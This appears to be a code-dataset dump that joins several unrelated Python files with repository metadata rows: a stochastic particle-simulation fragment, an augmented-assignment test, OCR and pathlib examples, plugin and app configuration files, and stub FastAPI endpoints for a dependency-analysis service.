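## In the arrays below, K_1[0] and K_2[0] are the position increments (velocity * h),
## while K_1[1] and K_2[1] are the velocity increments (drift * h plus the noise term).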
dBt=dBcum[trial+1,0,t]
S=dBcum[trial+1,1,t]
K_1=np.array([Vnow,csmpf(Pnow,Vnow)])*h+np.array([np.zeros((N,2)),(dBt-S*np.sqrt(h))*brown(Vnow)])
K_2=np.array([Vnow+K_1[1],csmpf(Pnow+K_1[0],Vnow+K_1[1])])*h+np.array([np.zeros((N,2)),(dBt+S*np.sqrt(h))*brown(Vnow+K_1[1])])
Pnext=np.copy(Pnow)
Vnext=np.copy(Vnow)
Pnext+=(K_1[0]+K_2[0])/2
Vnext+=(K_1[1]+K_2[1])/2
Pnext=np.nan_to_num(Pnext)
Vnext=np.nan_to_num(Vnext)
## appending P,V, dB
P[t]=np.array([Pnext])
V[t]=np.array([Vnext])
## calculating and appending Vnrm, Xbnrm, phE
s=np.power(Vnext[:,0],2)+np.power(Vnext[:,1],2)
Vmean=np.array(np.mean(Vnext[:],axis=0))
Vnrm[t]=np.sum(s)-N*np.sum(np.power(Vmean,2))
Xbmean=np.array(np.mean(Pnext[:]-Z[:],axis=0))
Xbnrm[t]=np.sum(np.power(Pnext[:,0]-Z[:,0]-Xbmean[0],2)+np.power(Pnext[:,1]-Z[:,1]-Xbmean[1],2))
for i in range(N):
J = A_ph[i,:]==1
ssq=(np.power(P[t,i,0]-Z[i,0]-P[t,:,0]+Z[:,0],2)+np.power(P[t,i,1]-Z[i,1]-P[t,:,1]+Z[:,1],2))[J]
phE[t]+=np.sum(phiEest(ssq,beta,phLB))
phE[t]*=M/2
##appending to cumulative data array
Pcum=np.append(Pcum,np.array([P]),axis=0)
Vcum=np.append(Vcum,np.array([V]),axis=0)
Vnrmcum=np.append(Vnrmcum,np.array([Vnrm]),axis=0)
Xbnrmcum=np.append(Xbnrmcum,np.array([Xbnrm]),axis=0)
phEcum=np.append(phEcum,np.array([phE]),axis=0)
if trial % 10 ==0 :
print("end %d" %trial)
elif dataset==1:
## loading data
## Pcum, Vcum, Vnrmcum, Xbnrmcum, phEcum
print(os.getcwd())
Pcum_df=pd.read_csv('./Pcum.csv',delimiter='\t')
Vcum_df=pd.read_csv('./Vcum.csv',delimiter='\t')
Vnrmcum_df=pd.read_csv('./Vnrmcum.csv',delimiter='\t')
Xbnrmcum_df=pd.read_csv('./Xbnrmcum.csv',delimiter='\t')
phEcum_df=pd.read_csv('./phEcum.csv',delimiter='\t')
Pcum_np=Pcum_df.to_numpy()
Vcum_np=Vcum_df.to_numpy()
Vnrmcum=Vnrmcum_df.to_numpy()
Xbnrmcum=Xbnrmcum_df.to_numpy()
phEcum=phEcum_df.to_numpy() # the rest of the script reads phEcum, so keep that name here
Pcum=Pcum_np.reshape(-1,T,N,2)
Vcum=Vcum_np.reshape(-1,T,N,2)
print(Pinit.shape)
print ("End\n")
medVnrm=np.median(Vnrmcum[1:],axis=0)
stdVnrm=np.std(Vnrmcum[1:],axis=0)
##Outlier detection
##find appropriate constant 'cut'
## that the number of trials which is further than 'cut' * std from median
## is larger than 1% but not too large
select=0
while select==0:
checkI= Vnrmcum-medVnrm > cut*stdVnrm
selcount = np.sum(checkI,axis=1)
selI = selcount > 0
print ('cut:%.2f select:%d' %(cut,np.sum(selI)))
if np.sum(selI)<=Trial*0.01 :
cut-=0.25
else :
select=1
print('select average')
print(np.mean(selcount))
break
##Plotting and saving plot
# plotsave=(input("Do you want to save? Yes=else, No=0 "))
plotsave=1
makeplot()
# How to save the files: data P,V,nV have shape Trial*T*N*2, while Vnrm, Xbnrm, dB have shape Trial*T
# For the former, reshape into a form that is easy to reassemble later with numpy.
##Saving data
# if savemode==1 then save only chosen data(i.e. outliers),
# elif savemode==2 then save all data
save_mode=2
savedata(save_mode)
print("DONE")
# Add a broken-axis ("wave") mark in the middle of the plot
# https://matplotlib.org/3.1.0/gallery/subplots_axes_and_figures/broken_axis.html broken-axis marks -> the figure ultimately has to be split into two subplots
# https://matplotlib.org/3.1.0/tutorials/intermediate/gridspec.html -> lets you place axes arbitrarily on a grid, like a patchwork
# https://stackoverflow.com/questions/53642861/broken-axis-slash-marks-inside-bar-chart-in-matplotlib
# %%
| 72.850467 | 10,027 | 0.536598 | 15,597 | 70,155 | 2.377188 | 0.073604 | 0.156836 | 0.013755 | 0.011517 | 0.441648 | 0.308089 | 0.241794 | 0.211775 | 0.200637 | 0.186153 | 0 | 0.22183 | 0.20861 | 70,155 | 962 | 10,028 | 72.926195 | 0.445983 | 0.106678 | 0 | 0.164486 | 0 | 0 | 0.019752 | 0.002835 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031776 | false | 0 | 0.031776 | 0.001869 | 0.082243 | 0.054206 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6ad8a755033ecac454450a7695caf96f0b658d20 | 478 | py | Python | codigo/Live199/exemplo_01.py | z4r4tu5tr4/live-de-quarta | 1d12adb83f2afe306faf52e47edacef714c50574 | [
"MIT"
] | 2 | 2017-06-05T23:32:00.000Z | 2017-06-08T01:01:35.000Z | codigo/Live199/exemplo_01.py | z4r4tu5tr4/live-de-quarta | 1d12adb83f2afe306faf52e47edacef714c50574 | [
"MIT"
] | null | null | null | codigo/Live199/exemplo_01.py | z4r4tu5tr4/live-de-quarta | 1d12adb83f2afe306faf52e47edacef714c50574 | [
"MIT"
] | null | null | null | import os
if os.name == 'nt':
filename = r'\\files\\pasta_0\\arquivo_1.txt'
else:
filename = 'files/pasta_0/arquivo_1.txt'
with open(filename) as file:
print(file.read())
from pathlib import Path
path_atual = Path()
pasta_0 = path_atual / 'files' / 'pasta_0'
arquivo_0 = pasta_0 / 'arquivo_0.txt'
arquivo_0.exists() # True
arquivo_0.is_file() # True
arquivo_0.suffix # .txt
arquivo_0.stem # arquivo_0
arquivo_0.read_text()
# 'files/pasta_0/arquivo_0.txt'
| 17.703704 | 49 | 0.700837 | 79 | 478 | 3.974684 | 0.379747 | 0.229299 | 0.207006 | 0.229299 | 0.324841 | 0.140127 | 0 | 0 | 0 | 0 | 0 | 0.042394 | 0.161088 | 478 | 26 | 50 | 18.384615 | 0.740648 | 0.112971 | 0 | 0 | 0 | 0 | 0.203349 | 0.138756 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.0625 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6ada06bcfa9bbdada08caf10d98edb9ed5f71ce8 | 4,514 | py | Python | test/tests/augassign.py | jonco3/dynamic | 76d10b012a7860595c7d9abbdf542c7d8f2a4d53 | [
"MIT"
] | 1 | 2020-11-26T23:37:19.000Z | 2020-11-26T23:37:19.000Z | test/tests/augassign.py | jonco3/dynamic | 76d10b012a7860595c7d9abbdf542c7d8f2a4d53 | [
"MIT"
] | null | null | null | test/tests/augassign.py | jonco3/dynamic | 76d10b012a7860595c7d9abbdf542c7d8f2a4d53 | [
"MIT"
] | null | null | null | # output: ok
input = [10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]
expected = [11, 8, 30, 2.5, 2, 4, 10000000, 20, 2, 2, 14, 15]
def test(v):
v[0] += 1
v[1] -= 2
v[2] *= 3
v[3] /= 4
v[4] //= 5
v[5] %= 6
v[6] **= 7
v[7] <<= 1
v[8] >>= 2
v[9] &= 3
v[10] ^= 4
v[11] |= 5
return v
assert test(list(input)) == expected
class Wrapped:
def __init__(self, initial):
self.value = initial
def __eq__(self, other):
return self.value == other
def __iadd__(self, other):
self.value += other
return self
def __isub__(self, other):
self.value -= other
return self
def __imul__(self, other):
self.value *= other
return self
def __itruediv__(self, other):
self.value /= other
return self
def __ifloordiv__(self, other):
self.value //= other
return self
def __imod__(self, other):
self.value %= other
return self
def __ipow__(self, other):
self.value **= other
return self
def __ilshift__(self, other):
self.value <<= other
return self
def __irshift__(self, other):
self.value >>= other
return self
def __ior__(self, other):
self.value |= other
return self
def __iand__(self, other):
self.value &= other
return self
def __ixor__(self, other):
self.value ^= other
return self
assert test(list(map(Wrapped, input))) == expected
class Wrapped2:
def __init__(self, initial):
self.value = initial
def __add__(self, other):
return Wrapped(self.value + other)
def __sub__(self, other):
return Wrapped(self.value - other)
def __mul__(self, other):
return Wrapped(self.value * other)
def __truediv__(self, other):
return Wrapped(self.value / other)
def __floordiv__(self, other):
return Wrapped(self.value // other)
def __mod__(self, other):
return Wrapped(self.value % other)
def __pow__(self, other):
return Wrapped(self.value ** other)
def __lshift__(self, other):
return Wrapped(self.value << other)
def __rshift__(self, other):
return Wrapped(self.value >> other)
def __or__(self, other):
return Wrapped(self.value | other)
def __and__(self, other):
return Wrapped(self.value & other)
def __xor__(self, other):
return Wrapped(self.value ^ other)
assert test(list(map(Wrapped2, input))) == expected
class C:
def __init__(self, value):
self.value = value
o = C(1)
def incValue(self, other):
self.value += other
return self
o.__iadd__ = incValue
threw = False
try:
o += 1
except TypeError as e:
if "unsupported operand type" in str(e):
threw = True
assert threw
C.__iadd__ = incValue
o += 1
assert o.value == 2
class NonDataDescriptor:
def __get__(self, instance, owner):
def f(other):
o.value -= other
return o
return f
C.__iadd__ = NonDataDescriptor()
o += 1
assert o.value == 1
class D:
def __init__(self, initial):
self.value = initial
def __iadd__(self, other):
self.value += other
return self
def __add__(self, other):
return F(self.value - other)
class E:
def __init__(self, initial):
self.value = initial
def __iadd__(self, other):
self.value += other
return self
def __add__(self, other):
return NotImplemented
class F:
def __init__(self, initial):
self.value = initial
def __iadd__(self, other):
return NotImplemented
def __add__(self, other):
return F(self.value - other)
class G:
def __init__(self, initial):
self.value = initial
def __iadd__(self, other):
return NotImplemented
def __add__(self, other):
return NotImplemented
d = D(0); d += 1; assert d.value == 1
e = E(0); e += 1; assert e.value == 1
f = F(0); f += 1; assert f.value == -1
g = G(0);
threw = False
try:
g += 1
except TypeError:
threw = True
assert threw
assert g.value == 0
class H:
def __init__(self, initial):
self.value = initial
def __radd__(self, other):
return H(self.value + other)
h = 0; h += H(1); assert h.value == 1
# Test builtin stub reverses its arguments when required
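# (The identical assert is repeated below, presumably so that the second call exercises
#  the stub/cache created by the first one - an assumption about this test's intent.)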
def opt(a, b):
a += b
return a
assert opt(1, 1.5) == 2.5
assert opt(1, 1.5) == 2.5
print('ok')
| 23.268041 | 61 | 0.584626 | 610 | 4,514 | 4.02459 | 0.162295 | 0.14664 | 0.176782 | 0.10998 | 0.638697 | 0.626069 | 0.614664 | 0.561711 | 0.195112 | 0.195112 | 0 | 0.03392 | 0.294639 | 4,514 | 193 | 62 | 23.388601 | 0.737123 | 0.0144 | 0 | 0.371257 | 0 | 0 | 0.005848 | 0 | 0 | 0 | 0 | 0 | 0.083832 | 1 | 0.281437 | false | 0 | 0 | 0.11976 | 0.568862 | 0.005988 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
6aef32d96b642f7e1027413f538b1e4a32088548 | 458 | py | Python | xmlUtilLib.py | fermi-lat/xmlUtil | b1dc221207394c6e31ce3b91d95a67c0eeb8ab56 | [
"BSD-3-Clause"
] | null | null | null | xmlUtilLib.py | fermi-lat/xmlUtil | b1dc221207394c6e31ce3b91d95a67c0eeb8ab56 | [
"BSD-3-Clause"
] | null | null | null | xmlUtilLib.py | fermi-lat/xmlUtil | b1dc221207394c6e31ce3b91d95a67c0eeb8ab56 | [
"BSD-3-Clause"
] | null | null | null | # $Header: /nfs/slac/g/glast/ground/cvs/GlastRelease-scons/xmlUtil/xmlUtilLib.py,v 1.2 2009/08/06 23:59:48 jrb Exp $
def generate(env, **kw):
if not kw.get('depsOnly', 0):
env.Tool('addLibrary', library = ['xmlUtil'])
if env['PLATFORM'] == 'win32':
env.Tool('findPkgPath', package = 'xmlUtil')
env.Tool('xmlBaseLib')
env.Tool('facilitiesLib')
env.Tool('addLibrary', library = env['xercesLibs'])
def exists(env):
return 1;
| 35.230769 | 116 | 0.646288 | 64 | 458 | 4.625 | 0.6875 | 0.118243 | 0.114865 | 0.162162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052083 | 0.161572 | 458 | 12 | 117 | 38.166667 | 0.71875 | 0.248908 | 0 | 0 | 1 | 0 | 0.289474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6af0bb5cfa1c474d50abf3d422c13b8bfda0c5b4 | 509 | py | Python | FenrTech SOLUTION-1/Image2Text/ImToStr1.py | MdNazmul9/PYTHON_CODE_ALL | 75046943f1bb6b4a010955b23bfe3f01cd08a473 | [
"MIT"
] | null | null | null | FenrTech SOLUTION-1/Image2Text/ImToStr1.py | MdNazmul9/PYTHON_CODE_ALL | 75046943f1bb6b4a010955b23bfe3f01cd08a473 | [
"MIT"
] | null | null | null | FenrTech SOLUTION-1/Image2Text/ImToStr1.py | MdNazmul9/PYTHON_CODE_ALL | 75046943f1bb6b4a010955b23bfe3f01cd08a473 | [
"MIT"
] | null | null | null | import cv2
import pytesseract
#pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'
#pytesseract.pytesseract.tesseract_cmd = 'C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe'
pytesseract.pytesseract.tesseract_cmd = r'C:\Users\User\AppData\Local\Tesseract-OCR\tesseract.exe'
img = cv2.imread('./BreakingNews.png')
text = pytesseract.image_to_string(img)
print(text)
img = cv2.imread('./BitCoin.jpeg')
text = pytesseract.image_to_string(img)
print(text) | 39.153846 | 99 | 0.766208 | 68 | 509 | 5.632353 | 0.397059 | 0.229765 | 0.24282 | 0.266319 | 0.610966 | 0.610966 | 0.511749 | 0.511749 | 0 | 0 | 0 | 0.01073 | 0.084479 | 509 | 13 | 100 | 39.153846 | 0.811159 | 0.363458 | 0 | 0.444444 | 0 | 0 | 0.279743 | 0.176849 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.222222 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a7b1cd2b2a1d357fd02ba117bde72a44afd1fa3 | 385 | py | Python | moban_tornado/__init__.py | PrajwalM2212/moban-tornado | c5279e7a643d11ff0881496a3b770ef2507d797a | [
"MIT"
] | 2 | 2019-02-24T11:59:19.000Z | 2019-02-24T11:59:19.000Z | moban_tornado/__init__.py | PrajwalM2212/moban-tornado | c5279e7a643d11ff0881496a3b770ef2507d797a | [
"MIT"
] | 3 | 2019-02-24T21:21:41.000Z | 2020-05-29T15:01:12.000Z | moban_tornado/__init__.py | moremoban/moban-tornado | c5279e7a643d11ff0881496a3b770ef2507d797a | [
"MIT"
] | null | null | null | from lml.plugin import PluginInfo, PluginInfoChain
import moban.constants as constants
from moban_tornado._version import __version__
from moban_tornado._version import __author__
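# Register EngineTornado with moban's plugin system: the chain below hooks this package
# in as a TEMPLATE_ENGINE_EXTENSION, selectable via the 'Tornado'/'tornado' tags.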
PluginInfoChain(__name__).add_a_plugin_instance(
PluginInfo(
constants.TEMPLATE_ENGINE_EXTENSION,
"%s.engine.EngineTornado" % __name__,
tags=["Tornado", "tornado", ],
)
)
| 27.5 | 50 | 0.758442 | 41 | 385 | 6.512195 | 0.536585 | 0.067416 | 0.11985 | 0.172285 | 0.217228 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161039 | 385 | 13 | 51 | 29.615385 | 0.826625 | 0 | 0 | 0 | 0 | 0 | 0.096104 | 0.05974 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
0a8a59fbc9f9de431d6267755346bfe6e2daa160 | 767 | py | Python | strikethrough_removal/src/__init__.py | RaphaelaHeil/strikethrough-removal-cyclegans | 91555b22cac6b6a379597aa94c23bdf02c9970a7 | [
"MIT"
] | 3 | 2021-08-30T12:37:14.000Z | 2022-02-09T16:07:14.000Z | strikethrough_removal/src/__init__.py | ektavats/strikethrough-removal-cyclegans | 35456619ff87fa010d2c161cff774af02142bae9 | [
"MIT"
] | null | null | null | strikethrough_removal/src/__init__.py | ektavats/strikethrough-removal-cyclegans | 35456619ff87fa010d2c161cff774af02142bae9 | [
"MIT"
] | 1 | 2022-01-25T10:30:54.000Z | 2022-01-25T10:30:54.000Z | from .utils import PadToSize, composeTransformations, getDiscriminatorModels, getGeneratorModels, \
getPretrainedAuxiliaryLossModel
from .metrics import calculateRmse, calculateF1Score
from .dataset import StruckCleanDataset, ValidationStruckCleanDataset, TestDataset
from .configuration import StrikeThroughType, ExperimentType, FeatureType, ModelName, Configuration, getConfiguration
__all__ = ["PadToSize", "composeTransformations", "getDiscriminatorModels", "getGeneratorModels",
"getPretrainedAuxiliaryLossModel", "calculateRmse", "calculateF1Score", "StruckCleanDataset",
"ValidationStruckCleanDataset", "TestDataset", "StrikeThroughType", "ExperimentType", "FeatureType",
"ModelName", "Configuration", "getConfiguration"]
| 69.727273 | 117 | 0.801825 | 45 | 767 | 13.577778 | 0.488889 | 0.101473 | 0.173486 | 0.232406 | 0.595745 | 0.261866 | 0 | 0 | 0 | 0 | 0 | 0.002933 | 0.110821 | 767 | 10 | 118 | 76.7 | 0.892962 | 0 | 0 | 0 | 0 | 0 | 0.349413 | 0.134289 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.444444 | 0 | 0.444444 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
0a91db1805ccec96b3f71337475826f22f3896b4 | 283 | py | Python | attendees/persons/apps.py | xjlin0/attendees32 | 25913c75ea8d916dcb065a23f2fa68bea558f77c | [
"MIT"
] | null | null | null | attendees/persons/apps.py | xjlin0/attendees32 | 25913c75ea8d916dcb065a23f2fa68bea558f77c | [
"MIT"
] | 5 | 2022-01-21T03:26:40.000Z | 2022-02-04T17:32:16.000Z | attendees/persons/apps.py | xjlin0/attendees32 | 25913c75ea8d916dcb065a23f2fa68bea558f77c | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class PersonsConfig(AppConfig):
name = "attendees.persons"
def ready(self):
# importing signal handlers # https://docs.djangoproject.com/en/dev/topics/signals/#preventing-duplicate-signals
import attendees.persons.signals
| 28.3 | 120 | 0.738516 | 32 | 283 | 6.53125 | 0.8125 | 0.15311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162544 | 283 | 9 | 121 | 31.444444 | 0.881857 | 0.381625 | 0 | 0 | 0 | 0 | 0.099415 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
0a9807c2f3907c5b205e154cd6248dfe4333924f | 183 | py | Python | update/venv/lib/python3.9/site-packages/fontTools/__init__.py | Imudassir77/material-design-icons | 63c5cb306073a9ecdfd3579f0f696746ab6305f6 | [
"Apache-2.0"
] | 38,667 | 2015-01-01T00:15:34.000Z | 2022-03-31T22:57:03.000Z | update/venv/lib/python3.9/site-packages/fontTools/__init__.py | azizhudai/material-design-icons | 63c5cb306073a9ecdfd3579f0f696746ab6305f6 | [
"Apache-2.0"
] | 1,192 | 2015-01-03T07:59:34.000Z | 2022-03-31T13:22:26.000Z | update/venv/lib/python3.9/site-packages/fontTools/__init__.py | azizhudai/material-design-icons | 63c5cb306073a9ecdfd3579f0f696746ab6305f6 | [
"Apache-2.0"
] | 11,269 | 2015-01-01T08:41:17.000Z | 2022-03-31T16:12:52.000Z | import logging
from fontTools.misc.loggingTools import configLogger
log = logging.getLogger(__name__)
version = __version__ = "4.22.1"
__all__ = ["version", "log", "configLogger"]
| 20.333333 | 52 | 0.754098 | 21 | 183 | 6 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024845 | 0.120219 | 183 | 8 | 53 | 22.875 | 0.757764 | 0 | 0 | 0 | 0 | 0 | 0.153005 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
0abc3a801eabf7fb558efa2abc0fd1fd2967300a | 185 | py | Python | web/__init__.py | aHugues/default-flask | 4d6c8c95f9f93b1fccc56aa413f912c86bf99bc3 | [
"Apache-2.0"
] | 1 | 2019-04-13T20:13:37.000Z | 2019-04-13T20:13:37.000Z | web/__init__.py | aHugues/default-flask | 4d6c8c95f9f93b1fccc56aa413f912c86bf99bc3 | [
"Apache-2.0"
] | 1 | 2019-04-14T13:31:10.000Z | 2019-04-14T13:31:10.000Z | web/__init__.py | aHugues/porygon-indexer | 8d6c9ca912c95d01a73a36f87e173e2a450441e8 | [
"Apache-2.0"
] | null | null | null | from flask import Flask
from .views import main_views
def create_app(debug=False):
app = Flask(__name__)
app.debug = debug
app.register_blueprint(main_views)
return app | 23.125 | 38 | 0.740541 | 27 | 185 | 4.777778 | 0.518519 | 0.139535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 185 | 8 | 39 | 23.125 | 0.86 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0.142857 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
0ad29e2d73a653c167863eb5398a68759438da21 | 123 | py | Python | ArchiveddashProblems/Problem_006.py | Utshaan/Archived_Problems | 423e8fc5db2dd5ee54a625cf8cbec2a8a271fcf3 | [
"MIT"
] | 1 | 2022-03-14T14:57:01.000Z | 2022-03-14T14:57:01.000Z | ArchiveddashProblems/Problem_006.py | Utshaan/Archived_Problems | 423e8fc5db2dd5ee54a625cf8cbec2a8a271fcf3 | [
"MIT"
] | 1 | 2022-03-13T12:33:07.000Z | 2022-03-13T12:50:42.000Z | ArchiveddashProblems/Problem_006.py | Utshaan/Archived_Problems | 423e8fc5db2dd5ee54a625cf8cbec2a8a271fcf3 | [
"MIT"
] | null | null | null | from fpack import SumofSquares, SquareofSum
x = int(input("number, now\n"))
a = SquareofSum(x) - SumofSquares(x)
print(a)
| 20.5 | 43 | 0.723577 | 18 | 123 | 4.944444 | 0.722222 | 0.269663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130081 | 123 | 5 | 44 | 24.6 | 0.831776 | 0 | 0 | 0 | 0 | 0 | 0.105691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0aec531afb01a71fa2d98ffd998050ce1a051ad6 | 3,078 | py | Python | app/api_v1/endpoints/kafka.py | endocode/fasten_api | a2f5c712fb0f39de664ef98543c21d3eb472d9e9 | [
"Apache-2.0"
] | null | null | null | app/api_v1/endpoints/kafka.py | endocode/fasten_api | a2f5c712fb0f39de664ef98543c21d3eb472d9e9 | [
"Apache-2.0"
] | null | null | null | app/api_v1/endpoints/kafka.py | endocode/fasten_api | a2f5c712fb0f39de664ef98543c21d3eb472d9e9 | [
"Apache-2.0"
] | null | null | null | from fastapi import APIRouter
from api_v1.endpoints.utils import connect_kafka
router = APIRouter()
@router.get("/")
async def root():
return {"message": "it's working!"}
@router.get("/{pkg_manager}/{product}/deps/{timestamp}")
def rebuild_dependency_net(pkg_manager: str, product: str, timestamp: int):
"""
Given a product and a timestamp, reconstruct its dependency network
Return: A set of revisions, along with an adjacency matrix
REST examples:
GET /api/mvn/org.slf4j:slf4j-api/deps/1233323123
GET /api/pypi/numpy/deps/1233323123?transitive=true
"""
msg = connect_kafka()
# TODO: send a kafka topic requesting a set of revisions
# TODO: read the kafka topic with the answer
# TODO: transform the data from kafka (if necessary)
# TODO: return the set of revisions
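    # A minimal, hypothetical sketch (not this project's actual wiring) of the round trip
    # the TODOs above describe, assuming kafka-python and made-up topic names
    # 'fasten.api.requests' / 'fasten.api.responses':
    #
    #     import json
    #     from kafka import KafkaProducer, KafkaConsumer
    #     producer = KafkaProducer(value_serializer=lambda v: json.dumps(v).encode('utf-8'))
    #     producer.send('fasten.api.requests', {'pkg_manager': pkg_manager,
    #                                           'product': product,
    #                                           'timestamp': timestamp})
    #     producer.flush()
    #     consumer = KafkaConsumer('fasten.api.responses',
    #                              value_deserializer=lambda v: json.loads(v.decode('utf-8')))
    #     revisions = next(iter(consumer)).value  # blocks until an answer message arrives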
return msg
@router.get("/{pkg_manager}/{product}/cg/{timestamp}")
def get_call_graph():
"""
Given a product and a timestamp, retrieve its call graph
Use case: A user wants to run a custom analysis locally.
Return: A JSON-serialized RevisionCallGraph
REST examples:
GET /api/mvn/org.slf4j:slf4j-api/cg/1233323123
GET /api/pypi/numpy/cg/1233323123?transitive=true
"""
pass
@router.get("/{pkg_manager}/{product}/{version}")
def get_metadata():
"""
Given a product and a version, retrieve all known metadata
Return: All known metadata for a revision
REST examples:
GET /api/mvn/org.slf4j:slf4j-api/1.7.29
GET /api/pypi/numpy/1.15.2
"""
pass
@router.get("/{pkg_manager}/{product}/{version}/vulnerabilities")
def get_vulnerabilities():
"""
Vulnerabilities in the transitive closure of a package version
Expected result, in order of detail
- Paths of revisions,
- Paths of files / compilation units,
- Paths of functions
REST examples:
GET /api/mvn/org.slf4j:slf4j-api/1.7.29/vulnerabilities
GET /api/pypi/numpy/1.15.2/vulnerabilities
"""
pass
@router.post("/{pkg_manager}/{product}/{version}/impact")
def post_():
"""
Impact analysis
Use case: the user asks the KB to compute the impact of a semantic change
to a function
    Expected result: The full set of functions reachable from the provided
function
REST examples:
POST /api/mvn/org.slf4j:slf4j-api/1.7.29/impact
POST /api/mvn/org.slf4j:slf4j-api/1.7.29/impact?transitive=true
The post body contains a FASTEN URI
"""
# TODO: need to clarify this use case
pass
@router.post("/{pkg_manager}/{product}/{version}/cg")
def update_cg():
"""
Update the static CG of a package version with new edges
Use case: A user runs an instrumented test suite locally and decides to
update the central call graph with edges that do not exist due to
shortcomings in static analysis.
    Expected result: A list of edges that were added.
REST examples:
POST /api/mvn/org.slf4j:slf4j-api/1.7.29/cg
POST /api/pypi/numpy/1.15.2/cg
"""
pass
